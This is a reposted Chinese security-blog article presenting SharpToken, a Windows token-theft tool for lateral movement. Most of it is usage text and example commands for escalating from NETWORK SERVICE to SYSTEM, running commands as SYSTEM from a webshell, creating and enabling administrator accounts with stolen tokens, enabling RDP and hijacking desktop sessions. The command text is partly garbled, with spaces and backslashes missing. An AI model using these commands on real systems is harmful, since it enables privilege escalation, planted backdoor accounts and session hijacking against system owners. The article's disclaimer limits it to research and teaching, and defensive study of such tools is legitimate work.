SharpToken By BeichenDream=========================================================Github : https://github.com/BeichenDream/SharpTokenIf you are an NT AUTHORITYNETWORK SERVICE user then you just need to add the bypass parameter to become an NT AUTHORITYSYSTEMe.g.SharpTokenexecute"NT AUTHORITYSYSTEM""cmd /c whoami"bypassUsage:SharpToken COMMAND argumentsCOMMANDS:list_token [process pid] [bypass]list_all_token [process pid] [bypass]add_user <username> <password> [group] [domain] [bypass]enableUser <username> <NewPassword> [NewGroup] [bypass]delete_user <username> [domain] [bypass]execute<tokenUser> <commandLine> [Interactive] [bypass]enableRDP [bypass]tscon <targetSessionId> [sourceSessionId] [bypass]example:SharpToken list_tokenSharpToken list_token bypassSharpToken list_token6543SharpToken add_useradminAbcd1234! AdministratorsSharpToken enableUser Guest Abcd1234! AdministratorsSharpToken delete_useradminSharpTokenexecute"NT AUTHORITYSYSTEM""cmd /c whoami"SharpTokenexecute"NT AUTHORITYSYSTEM""cmd /c whoami"bypassSharpTokenexecute"NT AUTHORITYSYSTEM"cmdtrueSharpTokenexecute"NT AUTHORITYSYSTEM"cmdtruebypassSharpToken tscon1
ListToken
枚举信息包括SID、LogonDomain、UserName、Session、LogonType、TokenType、TokenHandle(Duplicate后Token的句柄)、TargetProcessId(Token产生的进程)、TargetProcessToken(源进程中Token的句柄)、Groups(Token用户所在的组)位于)
SharpToken list_token
枚举来自指定进程的令牌
SharpToken list_token 468
获取交互式外壳
execute "NT AUTHORITYSYSTEM" cmd true
获取命令执行结果(在webshell下执行)
SharpToken execute "NT AUTHORITYSYSTEM" "cmd /c whoami"
使用窃取的令牌创建管理员用户
SharpToken add_user admin Abcd1234! Administrators使用被盗令牌启用管理员用户
SharpToken enableUser Guest Abcd1234! Administrators使用被盗令牌删除用户
SharpToken delete_user admin使用窃取的Token切换到目标桌面
其中1是目标用户的桌面,2是我们要接收的桌面
SharpToken tscon 1 2项目地址:
https://github.com/BeichenDream/SharpToken
原文始发于微信公众号(Ots安全):【横向移动】SharpToken - Windows 令牌窃取
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论